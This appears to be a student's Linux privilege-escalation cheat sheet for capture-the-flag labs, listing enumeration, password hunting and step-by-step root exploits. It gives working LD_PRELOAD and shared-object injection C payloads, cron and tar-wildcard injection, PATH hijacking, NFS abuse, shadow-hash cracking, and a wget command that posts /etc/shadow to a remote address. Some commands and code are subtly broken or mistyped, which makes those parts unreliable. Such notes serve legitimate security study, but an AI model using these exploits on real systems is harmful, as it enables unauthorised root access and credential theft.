LPE

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%
20Resources/Linux%20-%20Privilege%20Escalation.md
https://loveleshgangil.medium.com/linux-privilege-escalation-checklist-6ccfb13b11ca :
Checklist

Suid checker

python suid3num.py

https://gtfobins.github.io/

Methodology to follow

https://guif.re/linuxeop

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Re
sources/Linux%20-%20Privilege%20Escalation.md

sudo -l

Kernel Exploits

OS Exploits

Password reuse (mysql, .bash_history, 000- default.conf...)

Known binaries with suid flag and interactive (nmap)

Custom binaries with suid flag either using other binaries or with command execution

Writable files owned by root that get executed (cronjobs)

MySQL as root

Vulnerable services (chkrootkit, logrotate)

Writable /etc/passwd

Readable .bash_history

SSH private key

Listening ports on localhost

/etc/fstab

/etc/exports

/var/mail

Process as other user (root) executing something you have permissions to modify

SSH public key + Predictable PRNG

apt update hooking (PreInvoke)

1. System Enumeration
hostname : hostname

uname -a : kernel information

cat /proc/version : OS/Architecture

cat /etc/issue : same {might have a vuln. about threads or cores}

cat /etc/os-release : same

cat /etc/*-release : same

ps aux : show processes for all users

ps aux | grep root : look for processes running with high privileged accounts

lscpu : architecture information

date : the date information

timedatectl : geographical location of the machine

uptime : the information about the longivity of machine

env : environmental variables

df -h : how much of the disk was used

ls /dev : device listing

ls /dev | grep -i “sd” to find partions

cat /etc/fstab : mounts on disks

top : working services at that moment

mount : ?

/bin/lsblk

https://linux.die.net/man/8/lsblk

ps (process status) output:

PID : process ID

TTY: Terminal type used by user

Time: amount of cpu time used by the process

cmd: the command or executable running

ps -A : view all running process

ps axjf: view process tree

2. User Enumeration
sudo -l :list all commands your user can run using sudo.

id :uid by group

cat /etc/passwd :gives the users

cat /etc/passwd | cut -d : -f 1 :show all users

cat /etc/shadow :check access to shadow file

cat /etc/group :

history : check for passwords or scripts that were executed.

journalctl :

cat /etc/sudoers :list sudo accounts

whoami

who
w

last

last | tail -n 20

lastlog

sudo su -

Check the content of custom scripts that can be run and see if they can be exploited.
Check binaries that can be run and if their is a known method to exploit on GTFObins.
If the output contains “env_keep+=LD_PRELOAD”, see Linux Sudo LD_PRELOAD
Privilege Escalation.

3. Network Enumeration

ifconfig or ip a : shows ip address & networks

ip route : check arp table

arp -a (or ip neigh) : check neighbour connections (containing we communicate)

netstat -ano :which ports are open and what communications exits.

netstat -tunap

ss -tunap

lsof -i TCP:1-1024

ip route : to find out if there is another network

route

[ /sbin/route] ?

[ /usr/bin/route1 ] ?

Listening ports and established sessions :

netstat -ano

-a: display all sockets

-n: do not resolve names

-o: display timers

netstat -i

Note: these can be used to pivot.

4. Password Hunting

password, pass, pwd, passwd are some variations

grep --color=auto -rnw ‘/’ -ie “PASSWORD” --color=always 2> /dev/null

Identify sensitive files containing the word “PASSWORD” and display in the colour red. Also try
‘PASS=' and ‘PASSWD=’

locate password | more

identify the sensitive files with words same or similar to “password” in the file name

find / -name id_rsa 2>/dev/null :locate the rsa secret key

find / -name authorized_key 2>/dev/null

cat ~/.bash_history FOR CHAPTERS 8-11 USE THIS

cat /.history

history FOR CHAPTERS 8-11 USE THIS

history | grep pass

find . -type f -exec grep -i -I "PASSWORD" {} /dev/null ;

example:

step1. cat myvpn.ovpn

step2. one of the result can be like this

auth-user-pass /etc/openvpn/auth.txt

step3. cat /etc/openvpn/auth.txt

Sensitive files or information

Look for sensitive information

Backups
 locate *.bak
find / -name *.bak 2>/dev/null -exec ls -la {} ;

RSA Private keys

locate rsa
locate _key
find / -name private -type f -readable 2>/dev/null -exec ls -la {} ;
find / -name _key -type f -readable 2>/dev/null -exec ls -la {} ;

Look for hardcoded credentials in files

grep -Ril "flag" .

grep -Ri "password" .
grep -Ri "key" .
grep -Ri "sessionkey" .
grep -Ri "admin" .

To test, might cause problems...

grep -Ril "flag" / 2>/dev/null

grep -Ri "password" . 2>/dev/null
grep -Ri "key" . 2>/dev/null
grep -Ri "sessionkey" . 2>/dev/null
grep -Ri "admin" . 2>/dev/null

** LinPeas, LinEnum

5. find command

find . -name flag1.txt :find the file named flag1.txt in the current directory.

find / -type d -name config: find the directory named config under “/”

find / -type f -perm 0777: find files with the 777 permissions (files readable, writable, and
executable by all users)

find / -perm a=x: find executable files

find /home -user frank: find all files for user “frank” under “/home”

find / -mtime 10: find files that were modified in the last 10 days

find / -atime 10: find files that were accessed in the last 10 day
find / -cmin -60: find files changed within the last hour (60 minutes)

find / -amin -60: find files accesses within the last hour (60 minutes)

find / -size 50M: find files with a 50 MB size

find / -writable -type d 2>/dev/null : Find world-writeable folders

find / -perm -222 -type d 2>/dev/null: Find world-writeable folders

find / -perm -o w -type d 2>/dev/null: Find world-writeable folders

find / -perm -o x -type d 2>/dev/null : Find world-executable folders

Find development tools and supported languages:

find / -name perl*

find / -name python*

find / -name gcc*

find /* -user root -perm -4000 -print 2>/dev/null | grep -v

find / -perm -u=s -type f 2>/dev/null: Find files with the SUID bit, which allows us to run the file
with a higher privilege level than the current user.

Executable writable by others and owned by root

find -P / -type f -executable -user root -perm -o=w -name '*' 2>/dev/null -exec ls -la {} ;

Executable writable by others and owned by root with suid set... jackpot!

find -P / -type f -executable -user root -perm -o=w,u=s -name '*' 2>/dev/null -exec ls -la {} ;

Files readable by others and owned by another user

find -P / -user -perm -o=r -name '*' 2>/dev/null -exec ls -la {} ;

find -P / -user root -perm -o=r -name '*' 2>/dev/null -exec ls -la {} ;

suid & sgid files

find . -perm /6000 2>/dev/null -exec ls -la {} ;

find / -perm -4000 2>/dev/null

find / -perm -u=s -type f 2>/dev/null; find / -perm -4000 -o- -perm -2000 -o- -perm -6000
2>/dev/null

Files modified after adding a new user (can use any other file for comparison)

find -newer /etc/passwd 2>/dev/null -exec ls -la {} ;

Files that were edited within the last hour

find -mmin -60 2>/dev/null -exec ls -la {} ;

Find writable files / dirs outside of your home directory

find / -writable -type f -o -writable -type d 2>/dev/null | grep -Ev "^(/proc|/home/user|/tmp)"

Find directories writable by the current user

find / -writable -type d 2>/dev/null

Files containing passwords:

grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null

find . -type f -exec grep -i -I "PASSWORD" {} /dev/null ;

find . -type f -exec grep -i -I "database" {} /dev/null ;

grep --color=auto -rnw '/' -ie "drupal4hawk" --color=always 2> /dev/null

find . -type f -exec grep -i -I "drupal4hawk" {} /dev/null ;

6. Automated Tools

• LinPeas - https://github.com/carlospolop/privilege-escalation-awesome-scripts-
suite/tree/master/linPEAS

• LinEnum - https://github.com/rebootuser/LinEnum

• Linux Exploit Suggester - https://github.com/mzet-/linux-exploit-suggester

• Linux Priv Checker - https://github.com/sleventyeleven/linuxprivchecker

• GTFONow - https://github.com/Frissi0n/GTFONow

• Linux Smart Enumeration https://github.com/diego-treitos/linux-smart-enumeration

• BeRoot https://github.com/AlessandroZ/BeRoot
• unix privesc check https://github.com/pentestmonkey/unix-privesc-check

7. Kernel Exploits

• Identify the OS or the version with uname -a then google.

• Use Linux Exploit Suggester.

Some resources

https://www.linuxkernelcves.com/cves

https://github.com/lucyoa/kernel-exploits

searchsploit & exploitdb

8. Weak File Permissions : Readable /etc/shadow

step1. cat /etc/shadow (it's readable)

step2. save the root user's hash a file called hash.txt on your Kali.

step3. john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

step4. su root

Alternative: Assume we have readable passwd&shadow files.

step1. copy them into our kali as passwd.txt & shadow.txt

step2. unshadow shadow.txt passwd.txt > unshadowed.txt

and save it as creds.txt after deleting the unnecessary rows.

step3. google : hashcat hash types

https://hashcat.net/wiki/doku.php?id=hashcat

identify the hash type and "mode" from above link.

step4. hashcat64.exe -m creds.txt rockyou.txt -O

9. Weak File Permissions : Writeable /etc/shadow

step1. ls -l /etc/shadow

step2. mkpasswd -m sha-512 newpasswordhere

step3. edit the /etc/shadow with 0 uid/gid

step4. su root

10. Weak File Permission - Writeable /etc/passwd

step1. ls -l /etc/passwd

step2. mkpasswd -m sha-512 newpasswordhere

step3. edit the /etc/passwd

step4. su root

Alternative method.

step1. copy the root user's row to the end of the file.

step2. change username (hacker) with 0 uid/gid

step3. change password

step4. su hacker

Edit: you could have use openssl passwd 12345 in step2.

Read this!

https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/

11. Escalation via SSH Keys

find / -name authorized_keys 2> /dev/null : search public keys

find / -name id_rsa 2> /dev/null : search private keys

nano id_rsa

chmod 666 id_rsa

ssh -I id_rsa root@

: copy id_rsa into file and attempt ssh login

12. Escalation via Sudo Shell Escaping

note : GTFOBins library provides shell escape sequences.

https://gtfobins.github.io/

sudo -l : check user permissions and search GTFOBins for known shell escape sequences with
sudo privileges.

** if there are no escape shell available, we can try abusing intended functionalities. Searching
GTFOBins with a term like Apache will not return anything results. Then go to google and
search for apache sudo privilege escalation.

https://touhidshaikh.com/blog/2018/04/abusing-sudo-linux-privilege-escalation/

Screen clipping taken: 30/07/2023 00:11

sudo apache2 -f /etc/shadow : Abusing apache2 intended functionality

Abusing wget intended functionality

Screen clipping taken: 30/07/2023 00:12

sudo wget -post-file=/etc/shadow <IP:Port> abusing wget untended functionality

Note: Have a look at for the writeups of THM's “Privilege Escalation Playground” however
beware of that the room is not active

** sudo -l brings some results like this:

root ALL=(ALL:ALL) ALL

13. Sudo - Environmental Variables

https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld_preload

LD_PRELOAD : Optional environmental variable that contains path(s) to shared

libraries/objects which the loader loads before any other shared library. This process is called
preloading a library.

step1. sudo -l

step2. check if we have env_keep+=LD_PRELOAD

step3. save as /tmp/pe.c

#include <stdio.h>

#include <sys/types.h>

#include <stdlib.h>

void _init() {

unsetenv("LD_PRELOAD");

setgid(0);

setuid(0);

system("/bin/bash");

step4. compile it using

gcc -fPIC -shared -o pe.so pe.c -nostartfiles

step5. Finally, escalate privileges running:

sudo LD_PRELOAD=/home/user/pe.so #Use any command you can run with sudo

Note:

Exploit-DB for CVE-2019-14287 - https://www.exploit-db.com/exploits/47502

Exploit for CVE-2019-18634 - https://github.com/saleemrashid/sudo-cve-2019-18634

 14. Cron Jobs - Exploiting Weak File Permissions

https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld_preload

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Re
sources/Linux%20-%20Privilege%20Escalation.md#scheduled-tasks

Cron Jobs: Some kind of program/script that the user can schedule can run at a specific time or
interval. We are looking for a cron job writeable. In this scenario, we have a script called XYZ.sh
which is world writeable.

Step1. cat /etc/crontabs : List cronjobs

• * * * * * root overwrite.sh

• * * * * * root /usr/local/bin/compress.sh

Step2. locate overwrite.sh

/usr/local/bin/overwrite.sh

step2.1. ls -la /usr/local/bin/overwrite.sh

-rwxr--rw-

Step3. echo ‘cp /bin/bash /tmp/bash; chmod +s /tmp/bash’ > /home/user/overwrite.sh

step4. chmod +x /home/user/overwrite.sh

step5. ls -la /tmp (wait a minute)

step6. /tmp/bash -p

This Time we'll escalate via cron file overwrites

step2.1 ls -la /usr/local/bin/overwrite.sh

-rwxr--rw-

step3. echo ‘cp /bin/bash /tmp/bash; chmod +s /tmp/bash’ > /usr/local/bin/overwrite.sh

step5

step6

Note: if we don't have the overwrite.sh in /home/user make it exist! then go by step4.

15. Cron Jobs - Wildcards

step1. cat /etc/crontab

step2. cat /path/to/the/file/XYZ.sh

#!/bin/sh

cd /home/user

tar czf /tmp/backup.tar.gz *

(it is doing a backup with a wildcard, we can do a malicious)

step3. ls -la /path/to/the/file/XYZ.sh

-rwxr--r-- ... /path/to/the/file/XYZ.sh

Not Writeable

step4. echo ‘cp /bin/bash /tmp/bash; chmod +s /tmp/bash’ > /home/user/ABC.sh

step5. chmod +x ABC.sh

step6. Create these two files in /home/user:

We're going to write some tar specific commands.

touch /home/user/--checkpoint=1

touch /home/user/--checkpoint-action=exec=sh\ABC.sh

We're doing some injection into the wildcard.

step7. /tmp/bash -p

16. Cron Jobs - PATH Environmental Variable

step1. cat /etc/crontab

Step2. Assume PATH variable starts with /home/user on this scenario.

ls -la /home user.

Step3. cd /home/user

Step4. echo ‘cp /bin/bash /tmp/bash; chmod +s /tmp/bash’ > /home/user/XYZ.sh

step4. chmod +x /home/user/XYZ.sh

step5. /tmp/bash -p

17. SUID / SGID Executables : Known Exploits

SUID & SGID allows users to execute a file with the permission level of the file owner or the
group owner, respectively. Those files which have suid permissions run with higher privileges.

Assume we're accessing the target system as a non-root user and we found suid bit enabled
binaries, then those binaries can run with root privileges.

Some binaries and commands can be used by non-root users to escalate root access privileges
if the SUID bit is enabled. Some of those executable commands are : “bash, cat, cp, echo and
find”. You can also search for more ways to exploit the SUID permission on a binary using
GTFOBins.

These files have an “s” bit set.

Note: You can use linux-exploit-suggester.sh

IMPORTANT : not everything is vulnerable that suid bit is set.

step1. Listing SUID/SGID files

To list files which have SUID or SGID bits set:

• find /* -user root -perm -4000 -print 2>/dev/null

Locate by SUID bits and look for SUID files calling a service without a direct path.

• find / -type f -a ( -perm -u+s -o -perm -g+s ) -exec ls -l {} ; 2> /dev/null

#Find SUID

• find / -perm -u=s -type f 2>/dev/null

Locate SUID's

• find / -perm -4000 -type f -exec ls -la {} 2>/dev/null ;

• find / -uid 0 -perm -4000 -type f 2>/dev/null

Locate by SUID bits

#Find GUID

find / -perm -g=s -type f 2>/dev/null

step2. Try to find an exploit to results from Google, Exploitdb, GTFOBins, etc.

** Soma binaries may not be supposed to be in that list (such as nano. To exploit: Binaries with
the suid permission can be executed as the user who owns the file. If it's owned by root we will
try to get root shell.

ls -la /bin/nano

-rwsr-s-r-x root root ... /bin/nano

ls -la /etc/sudoers

-r--r----- root root ... /etc/sudoers

/bin/nano /etc/sudoers

under root user privilege add this :

hacker ALL=(ALL:ALL) ALL

save&exit.

sudo -l

sudo su root (I'm root).

18. SUID/SGID Executables - Shared Object Injection

One should pay attention to SUID-SO files (equivalent of DLL in Windows). For example:
/usr/local/bin/suid-so. This is vulnerable to shared object injection.

step1. /usr/local/bin/suid-so :Execute the file.

step2. strace /usr/local/bin/suid-so 2>&1 | grep -iE "open|access|no such file"

Search the output for open/access cals and for “no such file” errors. The executable tries to
load /home/user/.config/libcalc.so shared object within the home directory. However it's not find.

step3. mkdir /home/user/.config : Create the .config directory for the libcalc.so file.

step4. nano libcalc.c

#include <stdio.h>

#include <stdlib.h>

static void inject() attribute((constructor));

void inject() {

setuid(0);

system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");

step5. mkdir /home/user/.config

step6. gcc -shared -fPIC -o /home/user/.config/libcalc.so /home/user/libcalc.c

step7. /usr/local/bin/suid-so

19. SUID/SGID Executables - Environmental Variables

note: Another important vulnerable environment variables are suid-env & suid-env2

step1. find / -type -f perm -04000 -ls 2> /dev/null

Find all suid bit set files.

step2. Check the file : /usr/local/bin/suid-env

step3. Try running this binary and see what happens.

/usr/local/bin/suid-env

step4. Strings focus on determining the content of the binary files and extract us a text.

strings /usr/local/bin/suid-env

At the bottom we see “service apache2 start” which means it tries to start apache2 service.
And for that, it uses the “service” command. It uses the path to do so. Let's print it.

** service has no absolute path mentioned. When we run the suid-env, then it'll call service and
the system will try to find it in the directories or locations that are mentioned in the PATH
variable. So, if we add a directory to the beginning of the PATH variable so that system will find
our new directory first for this binary.

print $PATH will show you only bin files.

*** The main idea is changing the place or environmental variable where service is called or
trying to make a malicious service and malicious file called service.

step5. echo ‘int main() { setgid(0); setuid(0); system("/bin/bash"); return 0;}’ > /tmp/service.c
step5. gcc /tmp/service.c -o /tmp/service

Now we have a malicious service in /tmp. Now we'll change our path.

step6. export PATH=/tmp:$PATH

step7. print $PATH :we see /tmp here.

step8./usr/local/bin/suid-env

for suid-env2

step1. /usr/local/bin/suid-env2

step2. strings /usr/local/bin/suid-env2

at the bottom we have

/usr/sbin/service apache2 start

step3. function /usr/sbin/service() {cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }

step4. export -f /usr/sbin/service

step5. /usr/local/bin/suid-env2

root.

20. Capabilities

Linux divides the privileges traditionally associated with superuser into distinct units, known as
capabilities, which can be independently enabled and disabled.

https://linux.die.net/man/7/capabilities

To find the files with capabilities we use :

step1. getcap -r / 2>/dev/null

/usr/bin/python2.6 = cap_setuid+ep (permit everything)

step2. /usr/bin/python2.6 -c ‘import os; os.setuid(0); os.system("/bin/bash")’

we are root.

note : if you have the ability to run Python as a root user, you can do something malicious with
it.
For some examples:

https://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-capabilities

Linux Privilege Escalation using Capabilities -

https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/

SUID vs Capabilities - https://mn3m.info/posts/suid-vs-capabilities/

Linux Capabilities Privilege Escalation - https://medium.com/@int0x33/day-44-linux-capabilities-

privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099

21. NFS Root Squashing

step1. cat /etc/exports

identify if there is a folder which has no_root_squash term.

It means that folder is shareable and can be mounted. So we can mount the
/mnt/sharedfolder folder

When this setting is set, it will allow remote root users that have mounted this share in their
local system to change any file on it as root and leave malicious apps for other users to
execute.

step2. On our attacker machine :

showmount -e

One nfs share is stored under /mnt.

/tmp *

we can mount /mnt/sharedfolder folder.

this is my kali :

step3. mkdir /tmp/mountme

step4. mount -o rw,vers=2 target_ip:/mnt/sharedfolder /mnt/sharedfolder/mountme

We have mounted that folder!

Now we are going to create something malicious c file on our end.

step5. echo ‘int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }’ >
/mnt/sharedfolder/mountme/x.c

step6. gcc /mnt/sharedfolder/mountme/x.c -o /mnt/sharedfolder/mountme/x

ignore the warnings

step7. chmod +s /mnt/sharedfolder/mountme/x

step9. victim machine

cd /mnt/sharedfolder

step10. ./x

Network File System is a protocol that allows users to access files over a computer network
much like local storage is accessed, like many other protocols. It builds on the Open Network
Computing Remote Procedure Call (ONC RPC) system. If misconfigured, it could allow reguler
users to escalate privileges to root.

Once an attacker gains access to the target server that is running a misconfigured NFS service,
he will be able to escalate his privileges by exploiting the vulnerable NFS shares. He can view
the service configuration using the cat /etc/exports.

In order to exploit the vulnerable NFS share, a binary has to placed on it so that the SUID
permission can be assigned to it from the attacker machine.

port 2049 running nfs service

then step1.

showmount utility shows mount information about an NFS server and -e shows nfs export list

Note: No root squash means you have remote access , as a remote user you have root access
to the system. So everything what we were just doing there was done as root.

22. Docker

step1. Attacker machine

cd /transfer

step2. python -m SimpleHTTPServer 80

step3. victim machine

cd /tmp
step4. wget http://10.10.10.10/linenum.sh

step5. chmod +x linenum.sh

step6. ./linenum.sh

Check if we host Dosker and if we're a member of the Docker group.

step7. gtfobins→ docker → shell

step8. edit is as bash

23. Privilege Escalation via lxd

https://www.hackingarticles.in/lxd-privilege-escalation/

24. Other simulations

you might need to do port forwarding for PE. Check : [Pandora](onenote:Boxes.one#

Pandora§ion-id={4C44706D-61D5-4F26-A6EC-AA8EC15F9CE1}&page-id={994A20F3-
352D-422E-BD8F-D16599D2DB59}&end&base-
path=https://d.docs.live.net/7aaf298db149ec1a/Documents/1283)

Resources:

1. TCM Security Linux Privilege Escalation

2. https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%
20Resources/Linux%20-%20Privilege%20Escalation.md#scheduled-tasks
3. https://www.linkedin.com/pulse/linux-privilege-escalation-techniques-zakwan-abid/
4. THM's Linux Privilege Escalation room
5. https://book.hacktricks.xyz/linux-hardening/privilege-escalation/
6. https://www.studocu.com/uk/document/european-university-ukraine/data-structure/linux-
privilege-escalation-methodologysadffdasfsfsdfsdfsdfsdfssdf-shdgfs/24951055
7. https://macrosec.tech/index.php/2021/06/08/linux-privilege-escalation-techniques-using-
suid/
8. https://linux.die.net/man/7/capabilities
9. Linux Privilege Escalation using Capabilities - https://www.hackingarticles.in/linux-
privilege-escalation-using-capabilities/
10. SUID vs Capabilities - https://mn3m.info/posts/suid-vs-capabilities/
11. Linux Capabilities Privilege Escalation - https://medium.com/@int0x33/day-44-linux-
capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-
74d2bec02099
 12. Kayhan Kirbas's Course on Udemy (Turkish) : https://www.udemy.com/course/privilege-
escalation-2-gnu-linux/
13. Basic Linux Privilege Escalation - https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-
escalation/
14. Sushant 747's Guide (Country dependant - may need VPN) -
https://sushant747.gitbooks.io/total-oscp-guide/content/privilegeescalation-_linux.html
15. https://github.com/Gr1mmie/Linux-Privilege-Escalation-Resources
16. https://f1uffygoat.com/privesc/

https://steflan-security.com/linux-privilege-escalation-exploiting-user-defined-functions/?
source=post_page-----ad25b000b058

Suggester Tryhackme Rooms:

1. simple ctf
2. sudo security bypass
3. sudo buffer overflow
4. cmess
5. ultratech
6. vulnversity
7. lazy admin
8. anonymous
9. tomghost
10. convert my video
11. brainpan